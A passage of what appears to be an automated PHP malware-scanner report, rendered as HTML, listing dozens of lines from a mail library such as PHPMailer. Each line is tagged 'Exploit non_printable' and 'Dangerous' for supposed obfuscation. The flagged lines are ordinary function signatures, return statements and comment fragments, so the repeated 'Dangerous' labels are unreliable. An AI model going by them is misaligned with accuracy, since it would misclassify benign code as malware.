<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1304</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1306</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
